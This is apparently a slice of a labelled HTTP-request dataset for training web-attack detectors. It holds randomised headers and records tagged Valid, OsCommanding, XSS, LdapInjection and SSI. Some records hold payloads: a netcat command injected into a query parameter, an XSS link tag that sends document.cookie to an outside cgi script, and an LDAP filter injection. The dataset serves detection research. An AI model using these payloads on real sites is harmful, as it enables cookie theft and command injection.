Accept-Charset: utf-8;q=0.5, x-mac-arabic;q=0.8, x-mac-icelandic
Accept-Encoding: *
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 81.23.165.165
Cookie: JTpjiVpasswdH8=rAzZ;gesndbrmen6zepi=l4liq
Cookie2: $Version="5"
Date: Sun, 30 Oct 05 21:33:30 GMT
ETag: W/"Kc4B2yCixSefOHc"
Expect: Selo0dy=sc1LteA
From: aeec@eeAs.fr
If-Modified-Since: Thu, 11 Feb 10 18:57:54 UTC
If-Unmodified-Since: Fri, 23 Sep 05 10:04:14 GMT
If-Match: "sdX6m8_IsZAlrlYpUw"
If-None-Match: *
If-Range: Thu, 08 Jun 06 23:46:32 UTC
Max-Forwards: 60
MIME-Version: 9.6
Pragma: no-cache
Proxy-Authorization: NTLM NTdudWg3Ym5obGFlMFR2ZWliaXNhYWR0NHR4NTRhcnNvSXRhbw==
Authorization: Basic eWVuc2ZlaW86aXVkWXRzbw==
Range: 174-63482
Referer: http://www.iezio.biz/oaaeu/2bEhm/rjrhib.asmx
TE: trailers,trailers,deflate
Trailer: Upgrade
User-Agent: Mozilla/8.2 (X11; U; Open BSD i586 6.3; et-al; rv:3.3.2) Gecko/23837073
UA-CPU: MIPS
UA-Disp: 9503,087,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 7462x1873
Via: 8.9 7.244.61.105, FTP/4.5 www.boaI.jpeg, HTTP/6.6 187.224.114.237
Transfer-Encoding: TaeotE; a6ve=Uyinisn
Upgrade: nrr/7.3, ssae/3.9, Uaehed/6.1
Warning: 212 www.aeeaeyio.jpg "iorto9Sgs" "Wed, 05 Nov 08 05:06:08 GMT"
X-Forwarded-For: 90.32.42.192
X-Serial-Number: 62673072943112918
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 30686
Start - Id: 25397
class: Valid
GET /82eetph2limng0/e7grSpo/nled7dfhaDeRg2pis/rYCBCGVPdeval_4/u.Z.php4?w18mn=maillsl1oA3&sajlxese=89&ayfM=4092009&napteRF=ivsonfpdtlAh&ee=027&pro=itnneQed&uq3lt=inxee%401wbaN&se=ofo%3EAsu+&oatkerPleceI4e=69&reoErscAukmahI=aUuXYei&iwlbodtuytEsf=13&txebtsQulhUtCio=rayeevalebe8op&euekaL=ntteorhy%29%3Fps++5&HtMMhVinsert-2a9wp-=810&bnsE3fI0ume0un9=leb+AUe%24 HTTP/1.1
Host: 146.60.21.162
Connection: keep-alive
Accept: application/*;q=0.5
Accept-Charset: *
Accept-Encoding: 
Accept-Language: ia-on
Cache-Control: no-store
Client-ip: 45.139.165.17
Cookie: v-t_7adminhttpsy.htaccesI=5;tctkmldneNw= 5a[D4lstym;bE8hv=pe7U7assiic8m7ov;e26yeusbiOrhp=tfXVC;len6ooSl1einnz=[u aaiexmlt4 i
Cookie2: $Version="522"
Date: Wed, 15 Oct 08 21:48:43 UTC
ETag: "7@6wB8fqot3FBS2s4"
Expect: oqn3aldd=txcHa;tiyof
From: RaEi@caeoysheS.ch
If-Modified-Since: Mon, 30 Mar 09 05:16:09 CET
If-Unmodified-Since: Mon, 25 Jun 07 21:31:22 CET
If-Match: "pAPGMmhZ.1CJQgbHO4_"
If-None-Match: *
If-Range: Mon, 22 Oct 07 18:49:40 UTC
Max-Forwards: 0741
MIME-Version: 9.0
Pragma: 0np='emoynF'
Proxy-Authorization: NTLM eGxhbGxibGFwbmFzWGljcnNpaXB0ZTNzZGxzbmhuT2VzYXN0M2hybWI=
Authorization: Basic anhiZHNjOmxyYWtodG9l
Range: 7820-,350834-024
Referer: http://www.2iaht.ch/eerDesd/iI6i2/isHrmgn/y8batlu/eytiis6r.gif
TE: trailers,chunked;q=0.8
Trailer: Accept
User-Agent: Mozilla/6.7 (compatible; MSIE 6.6; Win98; 2oPeoLg0)
UA-CPU: x86
UA-Disp: 071,871,8
UA-OS: Linux
UA-Color: color32
UA-Pixels: 407x092
Via: zej/1.7 www.tif1e.tiff:77
Transfer-Encoding: identity
Upgrade: aer/3.2, cuxRP7/3.1, tvea/5.6, A3e/4.9
Warning: 569 www.t4X4iede.htm "7eueo" "Fri, 30 Apr 10 03:41:56 CET"
X-Forwarded-For: 128.87.150.234
X-Serial-Number: 06104
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25397
Start - Id: 21172
class: Valid
GET /0tnn/7K.tiff?tKntldc=LCnAdorO&etxtns2ojzah4a=m6qS0LmcNGZ.&eeitr5n=dZsoLHKf&0styleva-ur=0318058&muIl=691&7rXi0QiT=418656&ZMoPVvstdin0lL=8368 HTTP/1.0
Host: www.3hoaodedd.be
Connection: close
Accept: video/*
Accept-Charset: gb2312, x-mac-arabic, ks_c_5601-1987
Accept-Encoding: 
Accept-Language: eelrnh-Ore
Cache-Control: no-cache
Client-ip: 255.8.84.163
Cookie: 6uxtcep= tarajophpatm;;pgl.jLy=e@bin-hahttps;Aesimd=fJzc6ia;Eo=dtfeeuasc5
Cookie2: $Version="71"
Date: Sat, 14 May 05 17:34:00 UTC
ETag: W/"HyDAkkNEsSuJ@7Ia9Dm"
Expect: 100-continue
From: aetfaus@nbciblTus.fr
If-Modified-Since: Thu, 31 May 07 16:39:27 UTC
If-Unmodified-Since: Sat, 14 Feb 04 04:18:51 UTC
If-Match: *
If-None-Match: "8NmfRIjR4OqjPHZ@n"
If-Range: Fri, 10 Nov 06 22:57:55 UTC
Max-Forwards: 2723
MIME-Version: 5.4
Pragma: e=EhEeg
Proxy-Authorization: Digest cnonce="sSwzouba"
Authorization: Digest algorithm=s3boRw2
Range: -888689,46910-
Referer: /htqiGdm/niou2s/fdpyltts/ipeuocl/ssmiofc.mdb
TE: deflate;q=0.9
Trailer: Range
User-Agent: oispdm6 (oykmniuu; mlVLyVVQRj; s89CGaO)
UA-CPU: PowerPC
UA-Disp: 1305,9206,8
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 402x543
Via: 3.6 www.588h.png, so8r/4.7 28.64.4.193
Transfer-Encoding: compress
Upgrade: aoN/9.8
Warning: 554 www.g0den7.shtml "imsucel" "Thu, 03 May 07 11:10:04 CET"
X-Forwarded-For: 208.104.152.221
X-Serial-Number: 041648335
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21172
Start - Id: 43452
class: OsCommanding
GET /ebRaqttreeght/tf5lat/iKaRfAsxCltX/srd3qiyi7cilt/riNZGjt/iWanstteaSg4ieWemrae/eyaEtehudtptdstC/d6LE4wCPVN9eZsCzdhhZ/4K1X3YU3GHFwOvYvs@I.png?ddWnanafimsf5dc=88&qcek9e=98&ng=+etcs&ypaeeoooeoser=%3D%29Yfca+&tnye=764479&Z.IF.@IQ=++wuvslinkSc%24hinsertposition%5Bs%40ewBn&lADttmzstesyd=eteaaaLIaccess_logathFgaixterm%2Fa&eitetoltr=%250a+nc+++www.anantens.com++++80+++++%3B HTTP/1.1
Host: 185.176.6.78
Connection: keep-alive
Accept: text/*;q=0.3, video/mpeg
Accept-Charset: utf-7, windows-1255, euc-kr, cp-950, iso-2022-kr;q=0.6
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 106.211.70.62
Cookie: rrTearfmeeeo=zs?x;xYOXp=oet&cvard%ctbpel
Cookie2: $Version="5"
Date: Sat, 18 Nov 06 03:09:44 GMT
ETag: W/"KC8c4oPy9Q8-AacFtL"
Expect: 100-continue
From: eg5n@krsrziBnn.it
If-Modified-Since: Fri, 28 Dec 07 05:17:01 UTC
If-Unmodified-Since: Thu, 30 Mar 06 16:29:33 UTC
If-Match: "V7wcSN_i8QuCP19De"
If-None-Match: *
If-Range: Sat, 03 Apr 04 20:57:29 CET
Max-Forwards: 9381
MIME-Version: 4.0
Pragma: no-cache
Proxy-Authorization: senaTy nseaDz=wasioi
Authorization: Basic aUF3c21kYWk6YW1vbkU=
Range: -0418,311-
Referer: /37lfin/jnwi.dll
TE: trailers,trailers,trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/5.8 (compatible; Konqueror/4.6; Linux i586; qynzrTr6Hp)
UA-CPU: PowerPC
UA-Disp: 2710,0982,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 801x1629
Via: 8.5 67.0.125.165, eeeJ2/6.1 www.En8tecn.css:9653, ismo/9.7 www.EmrsnYf.gif
Transfer-Encoding: compress
Upgrade: s2or1r/5.6, unus/0.2, iUp/7.1
Warning: 854 www.dmgmntsM.css "es0e0ne4" "Sat, 04 Oct 08 20:47:43 GMT"
X-Forwarded-For: 52.147.136.153
X-Serial-Number: 09585074883862847117
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43452
Start - Id: 2429
class: Valid
GET /ta-PLgeZ_yMwl.P/XvdGgnodeAu7cPw/e_/YoptYKscriptx@RYFadmin10/9cyubFrC@qvAu2ZqnJlF.php?hiqg=byIpJp13OT&ctqAjrSn=7&ohrtotloqwfs=eese&ilhTE7sZc=7163&SoiLec3rvo1ttne=ffNcs0nenwk&tiytuq=93083&T1.H13S=7681644616&nvOiredoaoh=561&lrslnr3=sXI4a5g6KVjd HTTP/1.0
Host: www.tcUpf.it
Connection: keep-alive
Accept: audio/x-wav, text/plain;q=0.9
Accept-Charset: iso-8859-2, iso-2022-jp;q=0.0
Accept-Encoding: *
Accept-Language: 4l-gqer3, dsho5v-teus1e;q=0.5, etisotm-XZhe;q=0.5
Cache-Control: no-transform
Client-ip: 9.30.24.80
Cookie: essSateej3ih9n=oYfqCXSo0Cj8
Cookie2: $Version="593"
Date: Wed, 18 Jun 08 11:37:26 GMT
ETag: "9k0RaHlNgkWC-i0G"
Expect: ofld=1vaEplnp;ehzrxmsC=rzsh7r4
From: enlhjlne@u3aeaeei.biz
If-Modified-Since: Fri, 05 Feb 10 10:34:28 UTC
If-Unmodified-Since: Sat, 10 Jul 04 14:39:28 GMT
If-Match: *
If-None-Match: *
If-Range: "KpZ3WP2r0d-1Bc1"
Max-Forwards: 4286
MIME-Version: 5.2
Pragma: gchtisa='s3oe'
Proxy-Authorization: NTLM ZVVuQWl0cmV0MEVnZmhvbHNlYWhpMmVMdG9yejV5ZG9pcmllaTVuT2xld2hsbFJs
Authorization: NTLM MnNhaXprYWFib3VTb2ZzalNjdGxuYVV1YVAwbkllbGY=
Range: 489-1,80132-,0066-9
Referer: http://www.cunl.cz/icser/t0aaoi/9oanv/ncaSai.tar.gz
TE: trailers,trailers,deflate;q=0.8
Trailer: Date
User-Agent: ganoitao (ur@OfQuMA; oWGP5.n)
UA-CPU: Sparc
UA-Disp: 012,6333,16
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 213x610
Via: 6.9 192.217.103.69:1, 1.4 240.200.23.76, 5.5 46.134.209.58:949
Transfer-Encoding: deflate
Upgrade: tohtr/2.9, 8im/0.4, Looyi/2.2, csa/7.6, tleia/7.4
Warning: 492 www.astoe3u.js "irotdAesefitoeiuos" 
X-Forwarded-For: 213.191.153.150
X-Serial-Number: 802306505768249437
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 2429
Start - Id: 5980
class: Valid
POST /eephtIld5GknndEre/FP_fGb3Ac2y/sfabrdhyagto/ag/ew14RntawPyX-d/oseboeAnscIPtcg1eett/lZENl5/pohhlanieo/tJAgpYc/lKnTaQByu8nZoxWqw/M@YHu_RBzetcUvdstylek/mpo7cormmspNs.php4? HTTP/1.1
Content-Length: 28
Content-Language: ddO,dgegimo,DarCM
Content-Encoding: identity
Content-Location: http://i7hncmpe.gov/e2t0tElt/n8Rtg0o/xfdt4lcu/etioArt.css
Content-MD5: cW5zZHRhYVNpSGxNbG9mNQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 06 Apr 09 09:35:10 GMT
Last-Modified: Sat, 09 Dec 06 23:29:31 GMT
Host: 7.147.163.29
Connection: close
Accept: text/*;q=0.1, text/html, image/*;q=0.2
Accept-Charset: windows-1254;q=0.9, hz-gb-2312, hz-gb-2312;q=0.9, macintosh;q=0.7, windows-874;q=0.9
Accept-Encoding: *
Accept-Language: i5v-vm
Cache-Control: max-age=1
Client-ip: 157.18.89.84
Cookie: e3ernzarrt0eii=slyeba;DAtadmin=62;gVyU2X7x= Darw8hsn(wheremn5bfa;yliYc31=08525060;reutnc=stij
Cookie2: $Version="00"
Date: Sun, 24 Jan 10 22:43:42 CET
ETag: "y5.haur2zkTb3R0N5"
Expect: rr6iNl
From: aH2oeaxm@3EiRSay.org
If-Modified-Since: Sun, 26 Feb 06 10:34:33 GMT
If-Unmodified-Since: Wed, 19 Nov 08 14:56:49 GMT
If-Match: "SdMgTHDdD6waJWCZb"
If-None-Match: "PtvXhw6NIqDAkYygqJIl"
If-Range: "-2IhKqxT4J3U@u1O"
Max-Forwards: 982
MIME-Version: 8.3
Pragma: irotw=msnt
Proxy-Authorization: Digest nc=691127d9
Authorization: Basic ZWVlZDppb29hZQ==
Range: 7772-71595
Referer: http://ffneiWu.it/ifua.swf
TE: trailers
Trailer: User-Agent
User-Agent: Mozilla/7.0 (Machintosh; U; PPC 1.8; yt-Hg; rv:5.0.7) Gecko/88188726
UA-CPU: PowerPC
UA-Disp: 879,569,8
UA-OS: Win95
UA-Color: color32
UA-Pixels: 008x6801
Via: HTTP/2.5 80.9.223.231:50170, 5.0 99.227.59.19:6077
Transfer-Encoding: deflate
Upgrade: treana/1.3, oher5/3.1
Warning: 616 115.16.206.169:2 "ssgcrt2x" 
X-Forwarded-For: 232.218.22.35
X-Serial-Number: 913619752558918
----: --------------------
~~~~~: ~~~~~~~~~~~~~~

eimerhfcsevptt=teedron canaH

End - Id: 5980
Start - Id: 47057
class: XSS
GET /ssgNb/rhaldwietnTiot/i.apyhL7XWpIl56/oAMcR_g3n.php4?irikSsnesx7llg5=84230&HCeojaLtaairoct=%3Clink+++++rel+++%3D++++%22stylesheet+++%22+++href%3D%22++++javascript%3A%5Bdocument.location.replace+++%28%27http%3A%2F%2Fwww.letr.com%2Fcgi-bin%2Fatleasre.cgi%27%2Bdocument.cookie%29%3B%5D+++%22++%3E HTTP/1.1
Host: www.o7w4Auhehb.net
Connection: nnisen
Accept: image/png;q=0.1
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: cn=1sV
Client-ip: 66.107.218.203
Cookie: 5Eyigdriltexre=h&t;shhfnp=orc;iiadmnoenKeeb=ssamrAhdocumentht;t4hem5eroent=30;sa=eNanD3rejYK;qini=651755667
Cookie2: $Version="8"
Date: Sat, 30 Jan 10 02:09:15 UTC
ETag: W/"kR45JZ_ktO5@vv_3fZ"
Expect: 100-continue
From: ctya@sr6jtHsrss.cz
If-Modified-Since: Thu, 24 Dec 09 22:11:13 CET
If-Unmodified-Since: Wed, 05 Nov 08 13:22:42 CET
If-Match: "qBlIDkEWsqd1WmopfuOI"
If-None-Match: *
If-Range: "@7zCEbRjjE36qvoYnh"
Max-Forwards: 1
MIME-Version: 5.7
Pragma: tmraitc5=pu4qicmC
Proxy-Authorization: Basic dGVmdG81bXQ6enRlZ1I=
Authorization: Digest uri=http://www.re3ba6.cz/ritpti/aha8yls.txt
Range: 388869-790680,430-,-04157
Referer: http://www.srnOhs.de/haoai/wsgenD/toru8i6n.nsf
TE: deflate;q=0.8
Trailer: Authorization
User-Agent: Mozilla/4.6 (compatible; MSIE 8.5; WinNT; u4e7H)
UA-CPU: MIPS
UA-Disp: 016,6175,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 987x1282
Via: 4.1 www.eusEj.gif, FTP/9.9 www.greMyen.js
Transfer-Encoding: deflate
Upgrade: 1yiN/0.8, rtga/9.0
Warning: 964 245.225.40.21:93731 "csa6ao3oxtd9hnfoert" "Tue, 16 Nov 04 02:10:40 CET"
X-Forwarded-For: 59.196.39.49
X-Serial-Number: 9140776636485
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47057
Start - Id: 4628
class: Valid
POST /gpPUF3.mdb? HTTP/1.0
Content-Length: 190
Content-Language: il
Content-Encoding: compress
Content-Location: /pEHuei/nwre8/tsooess.css
Content-MD5: aW5kZGdDdDR1bnRvdHJwZg==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 19 Feb 07 24:06:24 UTC
Last-Modified: Mon, 07 Jan 08 06:13:48 CET
Host: www.qeSe.org
Connection: keep-alive
Accept: application/zip;q=0.7, audio/*;q=0.2
Accept-Charset: x-mac-japanese;q=0.8, x-mac-chinesetrad;q=0.7, hz-gb-2312
Accept-Encoding: 
Accept-Language: itR-e, 9eslaEes-ocNcsarz;q=0.1
Cache-Control: min-fresh=39
Client-ip: 163.169.220.127
Cookie: delete@gI=ksttsrcpih)$zpRI;ht0se=0wehoi7sbcjada6mb
Cookie2: $Version="2"
Date: Sun, 03 Sep 06 10:28:42 GMT
ETag: W/"gFGq_KoP8.wQ8Mju."
Expect: 100-continue
From: 9Gep2Hrs@icRis7.net
If-Modified-Since: Sat, 05 Jun 04 22:42:38 CET
If-Unmodified-Since: Wed, 09 Sep 09 10:39:26 GMT
If-Match: "zJDrw2pMqX9sD1aM"
If-None-Match: *
If-Range: *
Max-Forwards: 0
MIME-Version: 0.2
Pragma: no-cache
Proxy-Authorization: Digest username="lxtiuS"
Authorization: Basic cnRpY2lvbm86b0FSbXNk
Range: -0
Referer: http://SnebiauM.fr/a2kEiswq.css
TE: trailers,deflate
Trailer: Accept-Encoding
User-Agent: jeraGe9st/3.0.2.2.9
UA-CPU: PowerPC
UA-Disp: 183,1102,8
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 834x094
Via: HTTP/4.0 188.133.63.191
Transfer-Encoding: identity
Upgrade: uhu/4.6, unr/4.1, tud/0.6, tii/1.7
Warning: 848 215.17.207.198:27 "dhaswCc" "Tue, 17 Feb 09 02:45:11 CET"
X-Forwarded-For: 71.251.211.91
X-Serial-Number: 94988
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

7fqlyhobeioest=ausnbm&Nyaccess_log56Pmv=sl9i8idehreqticntm&e9CoZ433h0=qlo &ubdOCftuoPasij=1&osRvbaiwarbG=1]eG&i@B7@B=62&YC2lCU=j1ooaelxfu&8yrn=anrd&0lru=h9bsek&DnnREmqt=ieformr4&adi=596490

End - Id: 4628
Start - Id: 24946
class: Valid
GET /raessaciedel/TszsrrrCTnis/hg49/hSi.G-DHb.UkaQKm/lXC0A_/Df/dtu76/alrtxnmsllejr.css?KFYQ7a4POY=r HTTP/1.0
Host: www.tatsfe.it:80
Connection: carltst
Accept: video/mpeg, application/rtf;q=0.3
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: te='vohi7S4a'
Client-ip: 126.24.224.246
Cookie: d2sss=pft1I]xboot.inib;taBaXhwroe8wyrv=rf4jAhe;atJhaTfQ=et 4(rschildede&;pS87w5a=i0
Cookie2: $Version="95"
Date: Thu, 11 Mar 10 22:02:07 CET
ETag: "eL19A_153YDUOBz"
Expect: de4t
From: iefmllR@anati.de
If-Modified-Since: Sat, 22 Sep 07 07:38:11 CET
If-Unmodified-Since: Mon, 03 Jan 05 07:30:04 CET
If-Match: "Rrqz9cXrZEZyV63N1"
If-None-Match: *
If-Range: Fri, 06 Oct 06 08:39:09 GMT
Max-Forwards: 7021
MIME-Version: 9.9
Pragma: CpIh='em'
Proxy-Authorization: NTLM ZXp1c2NlbjFlYWhhaWhwTml4OXRtb2VvQ2VoamhKdDZEZWhGY21MbnRlbUNl
Authorization: Digest nonce
Range: -47448,86125-296,-084
Referer: http://84dmh.st/ltarG0i.php
TE: trailers
Trailer: If-Range
User-Agent: Mozilla/5.6 (X11; U; Open BSD i386 7.7; nI-el; rv:5.6.5) Gecko/55262865
UA-CPU: Sparc
UA-Disp: 899,4850,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 778x801
Via: 5.6 www.itnfnfst.htm, 3.7 161.251.162.144:1745, ieo/8.9 15.60.31.129
Transfer-Encoding: gedAd
Upgrade: ttaild/2.4, veere/8.1, dntrep/1.5, eseTr/3.4, ieS/1.5
Warning: 783 www.6rehhcy.gif "feesy9esr0fg" 
X-Forwarded-For: 38.96.136.60
X-Serial-Number: 2466804840974150
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24946
Start - Id: 38092
class: LdapInjection
GET /ZQpFR1P1/3QA/yL/it@LayrF7OGW/eya8ChkOibr.pl?CoIy2em=vup&nhzoe5azik3=32639374&SirltGte=lo&sThaN5g=%26c&aesmtnogtls0m=8rhm%29%28%26%28objectClass++++%3D++bd*%29&BWVEJyK=auutwahdEuTsniu&ll=2p2D%2Fu7ego%2F&c3ej=a9Nq95iS HTTP/1.0
Host: www.dhAc.cz
Connection: enii
Accept: text/html, text/*
Accept-Charset: cp-950;q=0.9
Accept-Encoding: *;q=0.5
Accept-Language: deannkp-6yeiufvo, hexwh-pnvnaU;q=0.6, 8Is-ecatns, xlp-zb56otes
Cache-Control: max-age=20099
Client-ip: 209.94.206.107
Cookie: 3yy8=- c
Cookie2: $Version="74"
Date: Sat, 06 Jan 07 10:56:21 CET
ETag: W/"ffkCjKJgxmCrLpG"
Expect: 100-continue
From: oaitn@wnslnp.com
If-Modified-Since: Mon, 27 Aug 07 24:58:53 CET
If-Unmodified-Since: Sat, 03 Feb 07 07:20:13 UTC
If-Match: *
If-None-Match: "OEHYpFSkHYnGj46Hy"
If-Range: Fri, 27 Nov 09 03:06:26 CET
Max-Forwards: 88
MIME-Version: 3.0
Pragma: 2eiNanEg=sena7dln
Proxy-Authorization: atswre uFty=o9ssf
Authorization: Basic dXRldHM6eVRhZ2lobGg=
Range: 77-,76-
Referer: /rlao.css
TE: deflate,trailers
Trailer: Pragma
User-Agent: Mozilla/7.0 (Machintosh; U; PPC 8.0; ma-ui; rv:6.3.3) Gecko/05633861
UA-CPU: 68000
UA-Disp: 119,1491,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 3700x2595
Via: 1.0 81.223.53.197, HTTP/5.2 www.IeeEe.jpg, HTTP/6.6 98.168.5.53
Transfer-Encoding: 4nis; ohirt=itsrh2
Upgrade: sS7i/3.2, haaoxa/5.4, fair/8.2
Warning: 525 www.tntaivc.png "taaisanteflseGtnsd" "Thu, 10 Jun 04 12:50:10 UTC"
X-Forwarded-For: 42.181.165.201
X-Serial-Number: 814494240740
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38092
Start - Id: 1590
class: Valid
GET /av4uBrM/WARSMK3VN-@c/tbrytd/mmihge6gnl/pTBqsu/heacaegCyshnrkase/ootDo4rticteeorxcMae/yL496VKp/pN9e1ahNe7hWkmn.pl?seslgie=un HTTP/1.1
Host: www.istiae.com
Connection: keep-alive
Accept: image/*;q=0.1, audio/x-wav;q=0.4, text/*
Accept-Charset: *
Accept-Encoding: *;q=0.8
Accept-Language: *;q=0.1
Cache-Control: only-if-cached
Client-ip: 189.174.255.66
Cookie: sosnbsatnCee=systemsk;om8g-=54848041;EFteqmtabi=v\ohnmeNo aHidp
Cookie2: $Version="959"
Date: Mon, 07 Aug 06 08:40:00 CET
ETag: W/"EO.POR4_ejWm0-ZQ"
Expect: 100-continue
From: OEgdherM@alennTl.st
If-Modified-Since: Tue, 09 Mar 10 18:05:53 GMT
If-Unmodified-Since: Thu, 20 Jan 05 03:53:23 UTC
If-Match: "qPo6Rp_HD8LbNiB2"
If-None-Match: *
If-Range: Fri, 06 Oct 06 12:35:56 GMT
Max-Forwards: 53
MIME-Version: 1.7
Pragma: no-cache
Proxy-Authorization: Basic cmlvNm5zOnJ0cHI=
Authorization: soie2 jhl2clx=desh
Range: -36692
Referer: http://www.ens4eG.uk/ishnl.wav
TE: trailers
Trailer: Expect
User-Agent: Mozilla/4.6 (Windows; U; WinNT 9.8; I4-sf; rv:6.0.2) Gecko/44075097
UA-CPU: StrongARM
UA-Disp: 1710,881,16
UA-OS: Linux
UA-Color: color32
UA-Pixels: 7934x8697
Via: 0.7 24.111.18.201
Transfer-Encoding: deflate
Upgrade: ris/8.4, oaNa/5.8, eftew/0.0, nig0/1.8
Warning: 673 72.154.61.36 "gnhtlcs" "Wed, 10 May 06 10:46:29 UTC"
X-Forwarded-For: 240.238.253.4
X-Serial-Number: 29285068
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1590
Start - Id: 34617
class: Valid
POST /o3j8wZvjypTqtO7Y/y8rz88r2nyGyn/EpsW/mdbteEceatrn0yEd3sht/QpUCSvkm4KCcatCG.tiff? HTTP/1.1
Content-Length: 196
Content-Language: Krcmt,yRyeti,zo
Content-Encoding: compress
Content-Location: http://4d7fpa.gov/tdpU/esaw/nlm2Sgit.css
Content-MD5: dHNuMHRycmxnb2ExNGVuZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 12 Dec 05 20:10:34 CET
Last-Modified: Sun, 26 Mar 06 15:02:11 CET
Host: 193.85.51.22
Connection: keep-alive
Accept: image/jpeg
Accept-Charset: iso-8859-5;q=0.6, iso-8859-15
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-transform
Client-ip: 234.206.164.47
Cookie: sibre6lcfbvu=vu2;2t1GQ2Qb=9137;rsncdOS=xaOEi;sa6sTpehrhio0=r7jR;orTumas=hGr1GVuJX.J9;QeobsdrBewsosj=ic C8
Cookie2: $Version="89"
Date: Sun, 19 Feb 06 17:48:02 CET
ETag: W/"li4Zf1d-Enhb1U4"
Expect: 100-continue
From: 9acwoadm@8yele.org
If-Modified-Since: Wed, 27 Aug 08 22:17:12 GMT
If-Unmodified-Since: Sat, 14 Nov 09 17:59:37 UTC
If-Match: "rBlTG4z-c_xNX8Ss"
If-None-Match: *
If-Range: Sun, 17 Oct 04 14:10:31 UTC
Max-Forwards: 254
MIME-Version: 8.2
Pragma: no-cache
Proxy-Authorization: Digest algorithm=MD5
Authorization: Basic aEFpYWhvZTozR3RlZW4=
Range: -64
Referer: http://yahtpq.uk/evt8yt/sysrmin/CEfuelSu/i6oak/ll5o.swf
TE: chunked,deflate
Trailer: Range
User-Agent: Mozilla/6.9 (compatible; aoaeoitxr; Windows NT; eejey2a1i)
UA-CPU: PowerPC
UA-Disp: 743,4010,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 6005x647
Via: rxtgs/0.2 30.111.99.167
Transfer-Encoding: gzip
Upgrade: i0taeg/8.4, k4xlia/5.0
Warning: 638 32.100.231.190 "ronreot0rsachetajte" 
X-Forwarded-For: 207.213.57.172
X-Serial-Number: 1977553705
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

rsrhreopnmOi=8&0YevWRSjrN=pmldE&thcqneni=8462559565&nippfn4tpnj1iGr=ntzaepT erj&&neOa1d0Nr=6785053&KNvGi=ipsohiOm&4hwto8xaad=hyrt8 n&8nhoe=ynoecpep slyeval%  2am&&dntrorcTonewzo=lkTLTbGcztzE

End - Id: 34617
Start - Id: 21927
class: Valid
GET /ixGE0YgFW5Z_enwhrkY3/tz-IOi_OnIuh67zT/t.sYy9p0.nsf?tocgtlin=havingueeo2%3Cm%25fbrobject&qy3Tgle=cAoaU4ea&mEVl-R7AM=varyeC&nedaloc=%26uio6&nhuosbcm=etwLgeRsnbden&miiniHhbfasA=180639&uEciechnOc=71658&saaanm=4151658094&aghrIaakEere=wcJR&eahdeihseyle=52&autoexecNHRchildE_Sy7=Coanefr%3Esdt1&Xirij3igo=tQ2w&orleohiaOt=3532790 HTTP/1.1
Host: www.nslwbsux.be
Connection: tSOaes
Accept: */*;q=0.8
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale=2722
Client-ip: 173.173.55.126
Cookie: utnqetaoo=155807;Dp3mZLkkGJE= jn7gncer;ddt=xanr;70YSHPFzsock_streamq=t1oh;bpgo1trtwcsw=sohay8fhodaia
Cookie2: $Version="934"
Date: Tue, 25 May 04 03:29:57 GMT
ETag: W/"XM6wxA4_U4sd4oar7"
Expect: 100-continue
From: eregee@ddutgEiyN.be
If-Modified-Since: Fri, 05 Jun 09 11:32:18 UTC
If-Unmodified-Since: Tue, 16 Oct 07 24:58:22 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 541
MIME-Version: 3.8
Pragma: ry6ot0mD='Fahaw'
Proxy-Authorization: Basic YXBiYTpqZW1r
Authorization: Basic NmFOaHo6YW1vbQ==
Range: 5944-,-4,93231-
Referer: http://www.7fasneri.ch/4tnlrr/de3t8eS/OtidDo/OfhErbye/Dqsi7d5.mp3
TE: trailers,chunked;q=0.6
Trailer: Referer
User-Agent: 4tj2 (ik@8DdZA@; 897BEeron; mTb3MyWb)
UA-CPU: x86
UA-Disp: 964,7426,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 6616x2901
Via: 8.7 184.114.181.36:47389
Transfer-Encoding: gzip
Upgrade: pwsw/0.0, dpee0/5.1
Warning: 706 118.112.66.251 "faTC6" "Thu, 05 Oct 06 20:03:57 UTC"
X-Forwarded-For: 235.150.2.160
X-Serial-Number: 09176432061314
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21927
Start - Id: 39527
class: SSI
